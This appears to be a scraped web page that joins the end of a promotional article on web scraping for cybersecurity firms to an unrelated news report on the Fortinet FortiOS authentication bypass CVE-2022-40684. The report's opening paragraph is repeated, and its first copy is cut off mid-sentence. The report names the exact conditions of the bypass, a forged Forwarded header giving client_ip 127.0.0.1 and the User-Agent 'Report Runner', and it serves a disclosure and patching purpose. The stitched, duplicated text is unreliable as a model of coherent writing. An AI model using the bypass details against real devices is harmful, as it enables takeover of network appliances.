From here, let’s say when an email comes into the organization’s network or a website is approached, the security team already knows the risk parameters attached to it and can flag the website internally for security reasons if need be.

**Web Scraping for Cybersecurity Firms**

Several US cybersecurity firms use web scraping to assess the risk of different domains for malware and fraud.

What the firms will do is generate or purchase lists of **potentially malicious domains**, and then route DNS (Domain Name System) requests to each of these links, servers, or websites, to see how they react to the request in real time.

What provides the edge for these teams, however, is that web scraping networks give the cybersecurity firms the ability to approach possibly malicious websites as a “victim,” or a real user, and see how the website would target an unsuspecting visitor. 

This is particularly useful in the security sector, as many malicious websites are now attempting to block or flag requests coming from known servers. This is done to cover up their illicit activities from these professionals. 

Web scraping provides an outlet for these firms to essentially fly under the radar to assess the risk, without the threat actor on the other end even knowing.

**Compliant Web Platforms for Security**

When using a web platform, security professionals need to choose a compliance-driven service provider to safeguard the integrity of their organization’s operations.

Compliant networks provide security teams with a safe and suitable environment in which to perform their work. Doing so ensures that the integrity of the platform remains intact by excluding any potential bad actors that could compromise the network.

These providers deploy extensive compliance processes that incorporate several internal as well as external procedures and safeguards to identify those who want to misuse the network so that they never gain access to the platform.

This includes manual reviews and third-party audits that identify non-compliant patterns. This ensures that the use of the network follows overall compliance guidelines and abides by the data-gathering guidelines established by international regulators, such as the EU and the US state of California.

So, while every web platform may seem similar, it’s important for security professionals to look out for these key distinctions when choosing a provider. Doing so will help maintain the integrity of web data collection operations.

**Key Takeaways**

Overall, in the post-Covid-19 era, studies have shown that the potential for fraud has become more commonplace over the past few years, placing a target on the backs of many US enterprises. 

US security teams have begun doing just that, by continuously mapping out the digital risks that are now increasingly prevalent.

In general, web scraping networks have helped turn this massively complex operation into a more manageable one by providing options to automate these multiple tasks for security teams – allowing them to target more web data sources and, in turn, increase the scope and sight of their cybersecurity focus.

After all, the aim is to ensure overall security. Access to reliable and real-time web data is the only way to fully catalog and understand the **digital risks and security threats** that can affect an organization at a moment’s notice.

How web data is leading US cybersecurity to unreached possibilities

A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches.
"FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said. "Additionally, a user can

A proof-of-concept (PoC) exploit code has been made available for the recently disclosed critical security flaw affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager, making it imperative that users move quickly to apply the patches.

"FortiOS exposes a management web portal that allows a user to configure the system," Horizon3.ai researcher James Horseman said. "Additionally, a user can SSH into the system which exposes a locked down CLI interface."

The issue, tracked as CVE-2022-40684 (CVSS score: 9.6), concerns an authentication bypass vulnerability that could allow a remote attacker to perform malicious operations on the administrative interface via specially crafted HTTP(S) requests.

A successful exploitation of the shortcoming is tantamount to granting complete access "to do just about anything" on the affected system, including altering network configurations, adding malicious users, and intercept network traffic.

That said, the cybersecurity firm said that there are two essential prerequisites when making such a request -

*   Using the Forwarded header, an attacker is able to set the client\_ip to "127.0.0.1"
*   The "trusted access" authentication check verifies that the client\_ip is "127.0.0.1" and the User-Agent is "Report Runner" both of which are under attacker control

The release of the PoC comes as Fortinet cautioned that it's already aware of an instance of active exploitation of the flaw in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory urging federal agencies to patch the flaw by November 1, 2022.

Threat intelligence firm GreyNoise has detected 12 unique IP addresses weaponizing CVE-2022-40684 as of October 13, 2022, with a majority of them located in Germany, followed by Brazzil, the U.S., China, and France.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#ios